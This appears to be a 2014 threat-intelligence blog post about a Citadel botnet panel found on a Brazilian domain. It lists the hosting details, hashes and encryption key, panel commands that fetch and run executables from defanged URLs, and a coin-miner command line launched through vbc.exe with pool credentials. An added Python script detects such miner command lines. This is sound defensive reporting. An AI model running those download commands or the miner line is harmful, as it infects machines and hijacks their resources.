Friday, May 9, 2014

saudevitalsuplementos.com - Citadel

Citadel botnet
https://zeustracker.abuse.ch/monitor.php?host=www.saudevitalsuplementos.com


saudevitalsuplementos.com
200.98.197.107
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.


Login page: (panel screenshot not preserved)

Home: 15 bots (panel screenshot not preserved)

Scripts:
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/musics/musicse.exe
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/imgs/setup.exe

https://malwr.com/analysis/MGU3OWU5MmIwYjkzNGY4MzkxYjQxZjUyODljMTFkZjA/
https://malwr.com/analysis/ZWU1NTM2NTZhOTI2NDQwZTk5ZTQ2YmM3NjJjNzQ0NDk/


b6e0e6bf92456476d0d1d813274192b0
drops this: 8FEE9A2354B3646A94DAEDB08B731DDA
(this dropped binary contains code from the Ufasoft coin miner, found here: http://ufasoft.com/coin/, and the miner is launched through the .NET Visual Basic compiler binary, vbc.exe, with the pool arguments shown in the command line)
Command line: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe -o http://super777.truemyenergy:x@dog.ltcoin.net:8016 -t 3 -T 83 -a scrypt -g no -I 0
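The command line above is a useful hunting pattern on its own: a legitimate .NET compiler image carrying pool-mining arguments. The following is an added example, not code from the original post, that scores process-creation events for that pattern; the decoy image names other than vbc.exe and the sample events are assumptions constructed for the demo.

```python
import re
from urllib.parse import urlparse

# Windows/.NET images seen hosting miner code. vbc.exe comes from the post; the
# others are assumed additions for the same detection idea.
DECOY_IMAGES = {"vbc.exe", "csc.exe", "msbuild.exe", "regasm.exe"}

# Argument shapes typical of pool-mining command lines (cf. the post's sample).
MINER_ARG_PATTERNS = {
    "scrypt_algo": re.compile(r"(?:^|\s)-a\s+scrypt\b", re.I),
    "thread_count": re.compile(r"(?:^|\s)-t\s+\d+\b"),
    "pool_url": re.compile(r"(?:^|\s)-o\s+(\S+)"),
}

def miner_indicators(image, cmdline):
    """Return the reasons a process looks like a pool miner hiding behind a
    benign image name; an empty list means no indicator fired."""
    reasons = []
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    pool = MINER_ARG_PATTERNS["pool_url"].search(cmdline)
    if pool:
        try:
            u = urlparse(pool.group(1))
            # worker:password@host:port is how the sample passes pool credentials
            if u.username and u.port:
                reasons.append(f"pool URL with credentials to {u.hostname}:{u.port}")
        except ValueError:
            pass  # malformed port in the URL; skip this indicator
    if MINER_ARG_PATTERNS["scrypt_algo"].search(cmdline):
        reasons.append("scrypt hashing algorithm selected")
    if MINER_ARG_PATTERNS["thread_count"].search(cmdline):
        reasons.append("explicit mining thread count")
    if reasons and name in DECOY_IMAGES:
        reasons.append(f"miner arguments under decoy image {name}")
    return reasons

def flag_events(events):
    """events: iterable of (image, cmdline); returns (image, reasons) for hits."""
    return [(img, r) for img, cmd in events if (r := miner_indicators(img, cmd))]

# Constructed process-creation events: the post's miner command line beside a
# legitimate compiler invocation of the same binary.
VBC = r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
SAMPLE_EVENTS = [
    (VBC, VBC + " -o http://super777.truemyenergy:x@dog.ltcoin.net:8016"
          " -t 3 -T 83 -a scrypt -g no -I 0"),
    (VBC, VBC + " /target:library /out:report.dll report.vb"),
]

if __name__ == "__main__":
    for img, reasons in flag_events(SAMPLE_EVENTS):
        print(img, "->", "; ".join(reasons))
```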

cf9ea8b950fce64b5f37212f1d34e3fd (VirusTotal: 35/50 detections)


These MD5s have been reported widely elsewhere.
The samples use Russian file names such as "VKontakte" (the Russian social network, comparable to Facebook).


Encryption Key:
78fghrYU%^&$ER

Same encryption key observed here:
http://protectyournet.blogspot.com/2014/05/saudeodontoscombr-citadel.html
